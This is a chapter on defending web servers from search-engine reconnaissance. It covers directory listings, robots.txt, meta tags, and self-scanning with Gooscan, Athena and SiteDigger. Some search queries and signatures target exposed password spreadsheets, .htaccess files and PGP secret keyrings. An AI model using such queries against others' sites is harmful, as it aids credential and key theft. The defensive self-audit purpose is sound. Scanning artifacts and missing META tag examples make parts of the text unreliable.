Don't get in the habit of splitting a public Web server into distinct roles based on access levels. It's too easy for a user to copy data from one file to another, which could render some directory-based protection mechanisms useless. Likewise, consider the implications of a public Web server system compromise. In a well thought out, properly constructed environment, the compromise of a public Web server only results in the compromise of public information. Proper access restrictions would prevent the attacker from bouncing from the Web server to any other machine, making further infiltration of more sensitive information all the more difficult for the attacker. If sensitive information were stored alongside public information on a public Web server, the compromise of that server could potentially compromise the more sensitive information as well.

We'll begin by taking a look at some fairly simple measures that can be taken to lock down a Web server from within. These are general principles; they're not meant to provide a complete solution but rather to highlight some of the common key areas of defense. We will not focus on any specific type of server but will look at suggestions that should be universal to any Web server. We will not delve into the specifics of protecting a Web application, but rather we'll explore more common methods that have proven especially and specifically effective against Web crawlers.

Directory Listings and Missing Index Files

We've already seen the risks associated with directory listings.
Although they are minor information leaks, directory listings allow the Web user to see most (if not all) of the files in a directory, as well as any lower-level subdirectories. As opposed to the "guided" experience of surfing through a series of prepared pages, directory listings provide much more unfettered access. Depending on many factors, such as the permissions of the files and directories as well as the server's settings for allowed files, a casual Web browser could get access to files that should not be public. Figure 11.1 demonstrates an example of a directory listing that reveals the location of an htaccess file. Normally, this file (which should be called .htaccess, not htaccess) serves to protect the directory contents from unauthorized viewing. However, a server misconfiguration allows this file to be seen in a directory listing and even read.

Figure 11.1 Directory Listings Provide Road Maps to Nonpublic Files
[Screenshot: an Apache directory listing, located with intitle:index.of ".htaccess", that shows an htaccess file alongside the other files in the directory.]

Directory listings should be disabled unless you intend to allow visitors to peruse files in an FTP-style fashion. On some servers, a directory listing will appear if an index file (as defined by your server configuration) is missing. These files, such as index.html, index.htm, or default.asp, should appear in each and every directory that should present a page to the user. On an Apache Web server, you can disable directory listings by placing a dash or minus sign before the word Indexes in the httpd.conf file.
The line might look something like this if directory listings (or "indexes," as Apache calls them) are disabled:

    Options -Indexes +FollowSymLinks +MultiViews

(Apache 2.4 rejects an Options line that mixes signed and unsigned keywords, so every option here carries an explicit sign.)

Blocking Crawlers with Robots.txt

The robots.txt file provides a list of instructions for automated Web crawlers, also called robots or bots. Standardized at www.robotstxt.org/wc/norobots.html, this file allows you to define, with a great deal of precision, which files and directories are off-limits to Web robots. The robots.txt file must be placed in the root of the Web server with permissions that allow the Web server to read the file. Lines in the file beginning with a # sign are considered comments and are ignored. Each line not beginning with a # should begin with either a User-agent or a disallow statement, followed by a colon and an optional space. These lines are written to disallow certain crawlers from accessing certain directories or files. Each Web crawler should send a user-agent field, which lists the name or type of the crawler. The value of Google's user-agent field is Googlebot. To address a disallow to Google, the user-agent line should read:

    User-agent: Googlebot

According to the original specification, the wildcard character * can be used in the user-agent field to indicate all crawlers. The disallow line describes what, exactly, the crawler should not look at. The original specifications for this file were fairly inflexible, stating that a disallow line could only address a full or partial URL. According to that original specification, the crawler would ignore any URL starting with the specified string. For example, a line like Disallow: /foo would instruct the crawler to ignore not only /foo but /foo/index.html, whereas a line like Disallow: /foo/ would instruct the crawler to ignore /foo/index.html but not /foo, since the slash trailing foo must exist.
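The prefix rule is easy to check with Python's standard urllib.robotparser module, which applies the same starts-with matching to disallow lines. The following is a minimal sketch rather than anything from the original text: the helper name allowed and the two rule strings are assumptions made up for the demonstration.

```python
from urllib.robotparser import RobotFileParser

def allowed(rules, path, agent="Googlebot"):
    """Return True if `agent` may fetch `path` under the given robots.txt text."""
    parser = RobotFileParser()
    parser.parse(rules.splitlines())
    return parser.can_fetch(agent, path)

# Two hypothetical robots.txt files that differ only in the trailing slash.
no_slash = "User-agent: *\nDisallow: /foo\n"
with_slash = "User-agent: *\nDisallow: /foo/\n"

for label, rules in (("Disallow: /foo", no_slash), ("Disallow: /foo/", with_slash)):
    for path in ("/foo", "/foo/index.html"):
        verdict = "allowed" if allowed(rules, path) else "blocked"
        print(f"{label:16} {path:16} {verdict}")
```

Running a check like this against your own rules before deploying them is a cheap way to catch a missing or extra slash.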
For example, a valid robots.txt file is shown here:

    #abandon hope all ye who enter
    User-Agent: *
    Disallow: /

This file indicates that no crawler is allowed on any part of the site, the ultimate exclude for Web crawlers. The robots.txt file is read from top to bottom as ordered rules. The original specification defines no allow line for a robots.txt file. To include a particular crawler, disallow it access to nothing. This might seem like backward logic, but the following robots.txt file indicates that all crawlers are to be sent away except for the crawler named Palookaville:

    #Bring on Palookaville
    User-Agent: *
    Disallow: /

    User-Agent: Palookaville
    Disallow:

Notice that there is no slash after Palookaville's disallow. (Norman Cook fans will be delighted to notice the absence of both slashes and dots from anywhere near Palookaville.) Saying that there's no disallow is like saying that user agent is allowed. It's sloppy and confusing, but that's the way it is.

Google allows for extensions to the robots.txt standard. A disallow pattern may include * to match any number of characters. In addition, a $ indicates the end of a name. For example, to prevent the Googlebot from crawling all your PDF documents, you can use the following robots.txt file:

    #Away from my PDF files, Google!
    User-Agent: Googlebot
    Disallow: /*.PDF$

Once you've gotten a robots.txt file in place, you can check its validity by visiting the Robots.txt Validator at www.searchengineworld.com/cgi-bin/robotcheck.cgi.

Underground Googling
Web Crawlers and Robots.txt

Hackers don't have to obey your robots.txt file. In fact, Web crawlers really don't have to, either, although most of the big-name Web crawlers will, if only for the "CYA" factor. One fairly common hacker trick is to view a site's robots.txt file first to get an idea of how files and directories are mapped on the server.
In fact, as shown in Figure 11.2, a quick Google query can reveal lots of sites that have had their robots.txt files crawled. This, of course, is a misconfiguration, because the robots.txt file is meant to stay behind the scenes.

Figure 11.2 Robots.txt Should Not Be Crawled
[Screenshot: Google results for inurl:robots.txt filetype:txt, about 7,660 hits, with snippets exposing the Disallow lines of several well-known sites' robots.txt files.]
www.lbm.com/robots.txt - 3k - Cached - Similar pag^es NOARCHIVE: The Cache "Killer" The robots.txt file keeps Google away from certain areas of your site. However, there could be cases where you want Google to crawl a page, but you don't want Google to cache a copy of the page or present a "cached" link in its search results. This is accomplished with a META tag. To prevent aU (cooperating) crawlers fi^om archiving or caching a document, place the following META tag in the HEAD section of the document: If you prefer to keep only Google from caching the document, use this META tag in the HEAD section of the document: " Any cooperating crawler can be addressed in this way by inserting its name as the META NAME. Understand that this rule only addresses crawlers. Web visi- tors (and hackers) can stiU access these pages. NOSNIPPET: Getting Rid of Snippets A snippet is the text listed below the title of a document on the Google results page. Providing insight into the returned document, snippets are convenient when you're blowing through piles of results. However, in some cases, snippets www.syngress.com 328 Chapter 11 • Protecting Yourself from Google Hackers should be removed. Consider the case of a subscription-based news service. Although this type of site would like to have the kind of exposure that Google can offer, it needs to protect its content (including snippets of content) from nonpaying subscribers. Such a site can accomplish this goal by combining the NOSNIPPET META tag with IP-based filters that allow Google's crawlers to browse content unmolested. To keep Google from displaying snippets, insert this code into the document: An interesting side effect of the NOSNIPPET tag is that Google will not cache the document. NOSNIPPET removes both the snippet and the cached page. Password-Protection Mechanisms Google does not fiU in user authentication forms. 
When presented with a typical password form, Google seems to simply back away from that page, keeping nothing but the page's URL in its database. Although it was once rumored that Google bypasses or somehow magically circumvents security checks, those rumors have never been substantiated. These incidents are more likely an issue of timing.

If Google crawls a password-protected page either before the page is protected or while the password protection is down, Google will cache an image of the protected page. Clicking the original page will show the password dialog, but the cached page does not, providing the illusion that Google has bypassed that page's security. In other cases, a Google news search will provide a snippet of a news story from a subscription site (shown in Figure 11.3), but clicking the link to the story presents a registration screen, as shown in Figure 11.4. This also creates the illusion that Google can magically bypass pesky password dialogs and registration screens.

Figure 11.3 Google Reveals a Page Snippet (a Google News search for team CSC restricted to the Chicago Tribune subscription source)

Figure 11.4 ...Although the Site Requires Registration

If you're really serious about keeping the general public (and crawlers like Google) away from your data, consider a password authentication mechanism. A basic password authentication mechanism, htaccess, exists for Apache. An htaccess file, combined with an htpasswd file, allows you to define a list of username/password combinations that can access specific directories. You'll find an Apache htaccess tutorial at http://httpd.apache.org/docs/howto/htaccess.html, or try a Google search for htaccess howto.

Software Default Settings and Programs

As we've seen throughout this book, even the most basic Google hacker can home in on default pages, phrases, page titles, programs, and documentation with very little effort. Keep this in mind and remove these items from any Web software you install. It's also good security practice to ensure that default accounts and passwords are removed as well as any installation scripts or programs that were supplied with the software.
Since the topic of Web server security is so vast, we'll take a look at some of the highlights you should consider for a few common servers.

The Microsoft IIS 5.0 Security Checklist (see the "Links to Sites" section at the end of this chapter) lists quite a few tasks that can help lock down an IIS 5.0 server in this manner:

■ Remove the \IISSamples directory (usually from c:\inetpub\iissamples).
■ Remove the \IISHelp directory (usually from c:\winnt\help\iishelp).
■ Remove the \MSADC directory (usually from c:\program files\common files\system\msadc).
■ Remove the IISADMPWD virtual directory (found in c:\winnt\system32\inetsrv\iisadmpwd directory and the ISM.dll file).
■ Remove unused script extensions:
    ■ Web-based password change: .htr
    ■ Internet database connector: .idc
    ■ Server-side includes: .stm, .shtm and .shtml
    ■ Internet printing: .printer
    ■ Index server: .htw, .ida and .idq

The Apache 1.3 series comes with fewer default pages and directories, but keep an eye out for the following:

■ The /manual directory from the Web root contains the default documentation.
■ Several language files in the Web root beginning with index.html. These default language files can be removed if unused.

Underground Googling
Patch That System

It certainly sounds like a cliche in today's security circles, but it can't be stressed enough: If you choose to do only one thing to secure any of your systems, it should be to keep up with and install all the latest software security patches. Misconfigurations make for a close second, but without a firm foundation, your server doesn't stand a chance.

Hacking Your Own Site

Hacking into your own site is a great way to get an idea of its potential security risks. Obviously, no single person can know everything there is to know about hacking, meaning that hacking your own site is no replacement for having a real penetration test performed by a professional.
Even if you are a pen tester by trade, it never hurts to have another perspective on your security posture. In the realm of Google hacking, there are several automated tools and techniques you can use to give yourself another perspective on how Google sees your site. We'll start by looking at some manual methods, and we'll finish by discussing some automated alternatives.

Warning
As we'll see in this chapter, there are several ways a Google search can be automated. Google frowns on any method that does not use its supplied Application Programming Interface (API) along with a Google license key. Assume that any program that does not ask you for your license key is running in violation of Google's terms of service and could result in banishment from Google. Check these important links, www.google.com/terms_of_service.html and www.bmedia.org/archives/00000109.php, for more information. Be nice to Google and Google will be nice to you!

Site Yourself

We've talked about the site operator throughout the book, but remember that site allows you to narrow a search to a particular domain or server. If you're sullo, the author of the (most impressive) NIKTO tool and administrator of cirt.net, a query like site:cirt.net will list all Google's cached pages from the cirt.net server, as shown in Figure 11.5.

Figure 11.5 A Site Search is One Way to Test Your Google Exposure

You could certainly click each and every one of these links or simply browse through the list of results to determine if those pages are indeed supposed to be public, but this exercise could be very time consuming, especially if the number of results is more than a few hundred. Obviously, you need to automate this process. Let's take a look at some automation tools.

Gooscan

Gooscan, written by Johnny Long, is a Linux-based tool that enables bulk Google searches. The tool was not written with the Google API and therefore violates Google's Terms of Service (TOS). It's a judgment call as to whether or not you want to knowingly violate Google's TOS to scan Google for information leaks originating from your site. If you decide to use a non-API-based tool, remember that Google can (though very rarely does) block certain IP ranges from using its search engine. Also keep in mind that this tool was designed for securing your site, not breaking into other people's sites. Play nice with the other children, and unless you're accustomed to living on the legal edge, use the Gooscan code as a learning tool and don't actually run it! Gooscan is available from http://johnny.ihackstuff.com.
Don't expect much in the way of a fancy interface or point-and-click functionality. This UNIX-based tool is command-line only and requires a smidge of technical knowledge to install and run. The benefit is that Gooscan is lean and mean and the best current alternative to the Windows-only tools.

Installing Gooscan

To install Gooscan, first download the tar file, decompressing it with the tar command. Gooscan comes with one C program, a README file, and a directory filled with data files, as shown in Figure 11.6.

Figure 11.6 Gooscan Extraction and Installation

    ~/Desktop$ tar -xvf gooscan-v0.9.tar
    gooscan-v0.9/
    gooscan-v0.9/gooscan.c
    gooscan-v0.9/data_files/
    gooscan-v0.9/data_files/filetype.gs
    gooscan-v0.9/data_files/gdork.gs
    gooscan-v0.9/data_files/indexof.gs
    gooscan-v0.9/data_files/inurl.gs
    gooscan-v0.9/README
    ~/Desktop$ cd gooscan-v0.9
    ~/Desktop/gooscan-v0.9$ gcc -o gooscan gooscan.c

Once the files have been extracted from the tar file, you must compile Gooscan with a compiler such as GCC. Mac users should first install the XCode package from the Apple Developers Connection Web site, http://connect.apple.com/. Windows users should consider a more "graphical" alternative such as Athena or SiteDigger, because Gooscan does not currently compile under environments like CYGWIN.

Gooscan's Options

Gooscan's usage can be listed by running the tool with no options (or a combination of bad options), as shown in Figure 11.7.
Figure 11.7 Gooscan's Usage

    gooscan <-q query | -i query_file> <-t target> [-o output_file] [-p proxy:port] [-v] [-d] [-s site] [-x xtra_appliance_fields]

Gooscan's most commonly used options are outlined in the included README file. Let's take a look at how the various options work:

■ <-t target> (required argument) This is the Google appliance or server to scan. An IP address or host name can be used here. Caution: Entering www.google.com here violates Google's terms of service and is neither recommended nor condoned by the author.
■ <-q query | -i query_file> (required argument) The query or query file to send. Gooscan can be used to send an individual query or a series of queries read from a file. The -q option takes one argument, which can be any valid Google query. For example, these are valid options:
    -q googledorks
    -q "microsoft sucks"
    -q "intitle:index.of secret"
■ [-i input_file] (optional argument) The -i option takes one argument: the name of a Gooscan data file. Using a data file allows you to perform multiple queries with Gooscan. See the following list for information about the included Gooscan data files.
■ [-o output_file] (optional argument) Gooscan can create a nice HTML output file. This file includes links to the actual Google search results pages for each query.
■ [-p proxy:port] (optional argument) This is the address and port of an HTTP proxy server. Queries will be sent here and bounced off to the appliance indicated with the -t argument. The format can be similar to 10.1.1.150:80 or proxy.validcompany.com:8080.
■ [-v] (optional argument) Verbose mode. Every program needs a verbose mode, especially when the author sucks with a command-line debugger.
■ [-s site] (optional argument) This filters only results from a certain site, adding the site operator to each query Gooscan submits. This argument has absolutely no meaning when used against Google appliances, since Google appliances are already site filtered. For example, consider the following Google queries:
    site:microsoft.com linux
    site:apple.com microsoft
    site:linux.org microsoft
  With advance express permission from Google, you could run the following with Gooscan to achieve the same results:
    $ ./gooscan -t www.google.com -s microsoft.com -q linux
    $ ./gooscan -t www.google.com -s apple.com -q microsoft
    $ ./gooscan -t www.google.com -s linux.org -q microsoft
■ The [-x] and [-d] options are used with the Google appliance. We don't talk too much about the Google appliance in this book. Suffice it to say that the vast majority of the techniques that work against Google.com will work against a Google appliance as well.

Gooscan's Data Files

Used in multiple query mode, Gooscan reads queries from a data file. The format of the data files is as follows:

    search_type|search_string|count|description

search_type can be one of the following:

■ intitle Finds search_string in the title of the page. If requested on the command line, Gooscan will append the site query. Example:
    intitle|error||
  This will find the word error in the title of a page.
■ inurl Finds search_string in the URL of the page. If requested on the command line, Gooscan will append the site query. Example:
    inurl|admin||
  This will find the word admin in the URL of a page.
■ indexof Finds search_string in a directory listing. If requested on the command line, Gooscan will append the site query. Directory listings often will have the term index of in the title of the page. Gooscan will generate a Google query that looks something like this:
    intitle:index.of search_string
  For example:
    indexof|htaccess||
  This search will find .htaccess files sitting in a directory listing on the server.

  Note
  When using the site switch, Gooscan automatically performs a generic search for directory listings. That query looks like this: intitle:index.of site:site_name. If this generic query returns no results, Gooscan will skip any subsequent indexof searches. It is a logical conclusion to skip specific indexof searches if the most generic of indexof searches returns nothing.
■ filetype Finds search_string as a filename, inserting the site query if requested on the command line. For example:
    filetype|cgi||
  This search will find files that have an extension of .cgi.
■ raw This search_type allows the user to build custom queries. The query is passed to Google unmodified, adding a site query if requested in the command line. For example:
    raw|filetype:xls email username password||
  This example will find Excel spreadsheets with the words email, username, and password inside the document.
■ search_string The search_string is fairly straightforward. Any string is allowed here except the characters \n and |. This string is URL-encoded ("HTML-ized") before it is sent to Google. The A character is converted to %41, and so on. There are some exceptions, such as the fact that spaces are converted to the + character.
■ count This field records the approximate number of hits found when a similar query is run against all of Google. Site is not applied. This value is somewhat arbitrary: it is based on the rounded numbers supplied by Google, and it can vary widely based on when and how the search is performed. Still, this number can provide a valuable watermark for sorting data files and creating custom data files. For example, zero count records could safely be eliminated before running a large search. (This field is currently not used by Gooscan.)
■ description This field describes the search type. Currently, only the filetype.gs data file populates this field. Keep reading for more information on the filetype.gs data file.

Several data files are included with Gooscan, each with a distinct purpose:

■ gdork.gs This file includes excerpts from the Google Hacking Database (GHDB) hosted at http://johnny.ihackstuff.com. The GHDB is the Internet's largest database of Google hacking queries, maintained by thousands of members who make up the Search Engine Hacking Forums, also hosted at http://johnny.ihackstuff.com. Updated many times a week, the GHDB currently sits at around 750 unique queries.
■ filetype.gs This huge file contains every known filetype in existence, according to www.filext.com. By selecting interesting lines from this file, you can quickly determine the types of files that exist on a server that might warrant further investigation. We suggest creating a subset of this file for use in the field, with a Linux command such as head -50 filetype.gs > short_filetype.gs.
Do not run this file as is. It's too big. With over 8,000 queries, this search would certainly take quite a while and burn precious resources on the target server. Instead, rely on the numbers in the count field to tell you how many (approximate) sites contain these files in Google, selecting only those that are the most common or relevant to your site. The filetype.gs file lists the most commonly found extensions at the top.
■ inurl.gs This very large data file contains strings from the most popular CGI scanners, which excel at locating programs on Web servers. Sorted by the approximate number of Google hits, this file lists the most common strings at the top, with very esoteric CGI vulnerability strings listed near the bottom. This data file locates the strings in the URL of a page. This is another file that shouldn't be run in its entirety.
■ indexof.gs Nearly identical to the inurl.gs file, this data file finds the strings in a directory listing. Run portions of this file, not all of it!

Using Gooscan

Gooscan can be used in two distinct ways: single-query mode or multiple-query mode. Single-query mode is little better than using Google's Web search feature, with the exception that Gooscan will provide you with Google's number of results in a more portable format. As shown in Figure 11.8, a search for the term daemon9 returns 2440 results from all of Google. To narrow this search to a specific site, such as phrack.org, add the [-s] option. For example:

    gooscan -q "daemon9" -t www.google.com -s phrack.org

Figure 11.8 Gooscan's Single-Query Mode

    ~/Desktop/gooscan-v0.9$ ./gooscan -q "daemon9" -t www.google.com
    ***!!! WARNING: You are querying a www.google.com server !!!***
    This tool was designed to query Google appliances, not the google.com website.
    The google.com scanning functionality is included for EDUCATIONAL PURPOSES ONLY
    to help webmasters determine the potential Google exposure of their sites.
    Do you acknowledge that:
    - You are knowingly violating Google's terms of service found at
      http://www.google.com/terms_of_service.html
    - You are using this tool to assess your own web site's exposure
    - The use of this tool in this way is not condoned by the author
    - You will not hold the author liable in any way for the use of this tool
    Agree? (y/n) [n] y
    doing lookup of www.google.com...
    "daemon9" returned 2440 results.

Notice that Gooscan presents a very lengthy disclaimer when you select www.google.com as the target server. This disclaimer is only presented when you submit a search that potentially violates Google TOS. The output from a standard Gooscan run is fairly paltry, listing only the number of hits from the Google search. You can apply the [-o] option to create a nicer HTML output format. To run the daemon9 query with nicer output, run:

    gooscan -q "daemon9" -t www.google.com -o daemon9.html

As shown in Figure 11.9, the HTML output lists the options that were applied to the Gooscan run, the date the scan was performed, a list of the queries, a link to the actual Google search, and the number of results.

Figure 11.9 Gooscan's HTML Output in Single-Query Mode (Site: none; Input file: none; Executed: Sun Oct 3 00:12:26 2004; one row for the search daemon9 with a link and 2440 results)

The link in the HTML output points to Google. Clicking the link will perform the Google search for you. Don't be too surprised if the numbers on Google's page differ from what is shown in the Gooscan output; Google's search results are sometimes only approximations.
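Before moving on to multiple-query mode, it may help to see the data file format in code. The following Python sketch is not Gooscan's implementation (Gooscan is a C program, and its source is not reproduced here); it only follows the rules described earlier: four pipe-separated fields, a search_type that decides how the query is built, an optional site restriction, and a count that can be used to thin out a large file. The function names, the sample lines and their counts, the min_count parameter, and the assumption that header lines start with # are ours, chosen purely for illustration.

```python
from typing import Iterable, Iterator, NamedTuple, Optional


class Entry(NamedTuple):
    search_type: str
    search_string: str
    count: Optional[int]  # None when the count field is empty
    description: str


def parse_line(line: str) -> Optional[Entry]:
    """Parse one 'search_type|search_string|count|description' line."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None  # assumption: blank and '#' lines carry no query
    parts = [part.strip() for part in line.split("|")]
    if len(parts) != 4:
        return None  # malformed line: skip it rather than guess
    search_type, search_string, count, description = parts
    return Entry(search_type.lower(), search_string,
                 int(count) if count.isdigit() else None, description)


def build_query(entry: Entry, site: Optional[str] = None) -> str:
    """Build the Google query string the text describes for each type."""
    prefixes = {
        "intitle": "intitle:",
        "inurl": "inurl:",
        "indexof": "intitle:index.of ",
        "filetype": "filetype:",
        "raw": "",  # raw queries are passed through unmodified
    }
    if entry.search_type not in prefixes:
        raise ValueError(f"unknown search_type: {entry.search_type}")
    query = prefixes[entry.search_type] + entry.search_string
    if site:
        query += f" site:{site}"  # the site restriction is appended
    return query


def select(lines: Iterable[str], min_count: int = 1) -> Iterator[Entry]:
    """Yield entries, dropping those whose recorded count is below min_count."""
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if entry.count is not None and entry.count < min_count:
            continue  # e.g. zero-count records, as the text suggests
        yield entry


# Made-up sample lines; the counts are not real Google figures.
SAMPLE = [
    "# sample header (assumed comment syntax)",
    "intitle|error|1200|",
    "filetype|cgi|0|",
    "raw|filetype:xls email username password||",
]

if __name__ == "__main__":
    for entry in select(SAMPLE):
        print(build_query(entry, site="example.com"))
```

Filtering on count before building any queries is one way to keep a batch small, which matters for the reasons discussed next.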
Running Gooscan in multiple-query mode is a blatant violation of Google's TOS but shouldn't cause too much of a Google-stink if it's done judiciously. One way to keep Google on your good side is to respect the spirit of its TOS by sending small batches of queries and not pounding the server with huge data files. As shown in Figure 11.10, you can create a small data file using the head command. A command such as:

    head -5 data_files/gdork.gs > data_files/little_gdork.gs

will create a four-query data file, since the gdork.gs file has a commented header line.

Figure 11.10 Running Small Data Files Could Keep Google from Frowning at You (a terminal session that creates little_gdork.gs with head, runs ./gooscan -t www.google.com -i data_files/little_gdork.gs with the -o option, accepts the disclaimer, and prints one result count per query)

The output from the multiple-query run of Gooscan is still paltry, so let's take a look at the HTML output shown in Figure 11.11.

Figure 11.11 Gooscan's HTML Output in Multiple-Query Mode (Site: none; Input file: data_files/little_gdork.gs; Executed: Sun Oct 3 00:24:39 2004)

    Search                                                              Link   Results
    "cacheserverreport for" "This analysis was produced by calamaris"   link   657
    intitle:"Ganglia" "Cluster Report for"                              link   339
    intitle:"Index of" dbconvert.exe chats                              link   0
    intitle:"Apache HTTP Server" intitle:"documentation"                link   171
    "Error Diagnostic Information" intitle:"Error Occurred While"       link   39900

Using Gooscan with the [-s] switch we can narrow our results to one particular site, in this case http://johnny.ihackstuff.com, with a command such as:

    gooscan -t www.google.com -s johnny.ihackstuff.com -i data_files/little_gdork.gs -o ihackstuff.html

as shown in Figure 11.12.

Figure 11.12 A Site-Narrowed Gooscan Run (Site: ihackstuff.com; Input file: data_files/little_gdork.gs; Executed: Sun Oct 3 00:43:51 2004; the same five queries, with 1 result for the Calamaris query and 0 for each of the others)

Most site-narrowed Gooscan runs should come back pretty clean, as this run did. If you see hits that look suspicious, click the link to see exactly what Google saw.
Figure 11.13 shows the Google search in its entirety.

Figure 11.13 Linking to Google's Results from Gooscan (a single Google result from ihackstuff.com for the Calamaris query)

In this case, we managed to locate the Google Hacking Database itself, which included a reference that matched our Google query. The other searches didn't return any results, because they were a tad more specific than the Calamaris query, which didn't search titles, URLs, filetypes, and the like.

In summary, Gooscan is a great tool for checking your Web site's exposure, but it should be used cautiously since it does not use the Google API. Break your scans into small batches, unless you (unwisely) like thumbing your nose at the Establishment.

Windows Tools and the .NET Framework

The Windows tools we'll look at all require the Microsoft .NET framework, which can be located with a Google query of .NET framework download. The successful installation of the framework depends on a number of factors, but regardless of the version of Windows you're running, assume that you must be current on all the latest service packs and updates. If Windows Update is available on your version of Windows, run it.
The Internet Explorer upgrade, available from the Microsoft Web site (Google query: Internet Explorer upgrade), is the update most commonly required for successful installation of the .NET Framework. Before downloading and installing Athena or SiteDigger, make sure you've got the .NET Framework properly installed.

Athena

Athena by Steve Lord (steve@buyukada.co.uk) is a Windows-based Google scanner that is not based on the Google API. As with Gooscan, the use of this tool is in violation of Google's TOS, and as a result, Google can block your IP range from using its search engine. Athena is potentially less intrusive than Gooscan, since Athena only allows you to perform one search at a time, but Google's TOS is clear: no automated scanning is allowed. Just as we discussed with Gooscan, use any non-API tool judiciously. History suggests that if you're nice to Google, Google will be nice to you.

Athena can be downloaded from http://snakeoillabs.com/. The download consists of a single MSI file. Assuming you've installed the .NET Framework, the Athena installer is a simple wizard, much like most Windows-based software. Once installed and run, Athena presents the main screen, as shown in Figure 11.14. As shown, this screen resembles a simple Web browser. The Refine Search text box allows you to enter or refine an existing query. The Search button is similar to Google's Search button and executes a search.

Figure 11.14 Athena's Main Screen

To perform basic searches with Athena, you need to load an XML file containing your desired search strings. Simply open the file from within Athena and all the searches will appear in the Select Query drop-down box. Simply select your query and click the Search button.
Selecting buddylist.blt and clicking Search will deliver the Google results from that search, as shown in Figure 11.15.

Figure 11.15 Basic Search Results

As you can see, the results of the query contain undesired items. Fortunately, Athena allows you to refine your query using the Refine Search box. Using the previous query, entering inurl:"buddylist.blt" into the Refine Search box and clicking the Search button provides a much cleaner search (see Figure 11.16).

Figure 11.16 Athena's Refine Query Feature in Action

At this point, Athena might seem rather pointless. It functions just like a Web browser, submitting queries into Google and displaying the results. However, Athena's most powerful functionality lies in its XML-based configuration files.

Using Athena's Config Files

Two of these files are included with Athena: Athena.xml and digicams.xml. These files contain custom queries and descriptions of those queries. The digicams file contains sample queries for finding images; the Athena.xml file contains the queries found in the GHDB. To load these files, click File | Open Config and select the XML file you'd like to use. Figure 11.17 shows Athena's main screen after you load Athena.xml.

Figure 11.17 Athena Loaded with Athena.XML

As mentioned, Athena uses the GHDB as a source for its searches, making it a very thorough scanning tool. The SiteDigger tool uses similar searches but has chosen not to officially support the GHDB.
This means that SiteDigger has far fewer researchers submitting new searches, making for a potentially less thorough search database.

Constructing Athena Config Files

Athena's XML-based config files, which are compatible with Foundstone's SiteDigger, can be modified or even completely overhauled based on your needs. There are two main sections to the XML file: a searchEngine section and the signature section. The searchEngine section describes how a particular search engine's queries are constructed. A typical searchEngine section is shown in the following code example:

    <searchEngine>
      <searchEngineName>Google (UK)</searchEngineName>
      <searchEnginePrefixUrl>http://www.google.co.uk/search?q=</searchEnginePrefixUrl>
      <searchEnginePostfixUrl>%26ie=UTF-8%26hl=en%26meta=</searchEnginePostfixUrl>
    </searchEngine>

This section is responsible for describing how the various search engines handle search requests. The searchEngineName field is simply a text-based field that describes the name of the search engine. This name will appear in Athena's drop-down box, allowing you to select from among different search engines. The searchEnginePrefixUrl field represents the first part of the search URL that is sent to the search engine. It is assumed that the query part of the search will be filled in after this prefix. The searchEnginePostfixUrl field describes the part of the URL that will come after the prefix and the query. This usually describes various options such as output format (UTF-8). Note that Athena uses the searchEngine section, and SiteDigger does not. This section could be reworked to search the U.S.-based Google engine with the following searchEngine section:

    <searchEngine>
      <searchEngineName>Google (US)</searchEngineName>
      <searchEnginePrefixUrl>http://www.google.com/search?q=</searchEnginePrefixUrl>
      <searchEnginePostfixUrl>%26ie=UTF-8%26hl=en%26meta=</searchEnginePostfixUrl>
    </searchEngine>

The signature section describes the individual searches that are to be performed. A typical signature section is shown in the following code example:

    <signature>
      <signatureReferenceNumber>22</signatureReferenceNumber>
      <categoryref>T1</categoryref>
      <category>TECHNOLOGY PROFILE</category>
      <querytype>DON</querytype>
      <querystring>intitle:"Index of" secring.bak</querystring>
      <shortDescription>PGP Secret Keyring Backup</shortDescription>
      <textualDescription>This query looked for a backup of the PGP secret key ring. With this keyring an attacker could decrypt messages encrypted by the user.</textualDescription>
      <cveNumber>1000</cveNumber>
      <cveLocation>http://johnny.ihackstuff.com</cveLocation>
    </signature>

The signatureReferenceNumber is a unique number assigned to each signature. The categoryref is a unique identifier that describes the signature in the context of its category, which is described in full by category. The querystring is the Google query that is to be performed. It is made HTML-friendly and inserted between the searchEnginePrefixUrl and the searchEnginePostfixUrl in the URL sent to Google. shortDescription and textualDescription are short and long descriptions of the search, respectively. The cveNumber and cveLocation refer to the www.cve.mitre.org Common Vulnerabilities and Exposures list.

The XML file should open with the standard XML declaration and the opening tag of the root element, and it should be closed out with the matching closing tag as well. Using this format, it's fairly simple to create a file of custom queries. The file must conform to the UTF-8 character set and be strictly XML compliant. This means that any HTML tags embedded in the file must not only be matched with closing tags but must also match in case, since XML tag names are case sensitive. Microsoft's XML scanner will complain about an opening tag followed by a closing tag whose case differs (an uppercase opening tag closed by its lowercase counterpart, for instance). The less-than and greater-than symbols (< and >) can also cause problems when used improperly. If your data contains the Internet shorthand for "grin," which is <g>, the MS XML scanner will complain.

Tools and Traps

Current Config Files

The maintainers of the GHDB make available current config files for use with Athena. These files can be downloaded from http://johnny.ihackstuff.com.

The Google API and License Keys

The only way Google will explicitly allow you to automate your queries is via the Google Application Programming Interface. We'll talk about programming in more detail later, but to get programs written with the Google API running, you'll need to obtain a license key, and to do that you must first create a Google account by visiting www.google.com/accounts/NewAccount. If you already have a Google account (obtained through Google Groups or the Gmail service, for example) you can log into that account through the Google accounts page, located at www.google.com/accounts. Once logged in, you can proceed to http://api.google.com/createkey to obtain your key. The license key is a sequence of characters that, when entered into any tool created with the Google API, allows you to perform 1000 automated queries per day.

SiteDigger

SiteDigger is a tool very similar to Athena, but it is automated and uses the Google API. You must acquire a Google license key to use this program. SiteDigger was architected by Mark Curphey, and development credit goes to Kartik Trivedi, Eric Heitzman, Aaron Higbee, and Shanit Gupta. You can download SiteDigger from www.foundstone.com/resources/proddesc/sitedigger.htm. In addition to a license key, you will need to download and install the Microsoft .NET Framework, as we discussed earlier in this chapter. There is no installation for SiteDigger; simply unzip the files into a directory and go.
Once launched, SiteDigger presents the main screen, shown in Figure 11.18.

Figure 11.18 SiteDigger's Main Screen

The main screen allows you to enter a domain (such as those used with the site operator) and your Google license key. The Search, Stop, and Clear buttons are self-explanatory. SiteDigger's menu bar is fairly useless. The only item worth using is Options, which allows you to update SiteDigger's signatures from Foundstone's Web site. The Signatures tab, shown in Figure 11.19, lists the queries that SiteDigger is capable of executing.

Figure 11.19 SiteDigger's Familiar Signatures
[Screenshot: the Signatures tab, listing checkbox-selectable queries grouped under categories such as BACKUP FILES and CONFIG MANAGEMENT.]

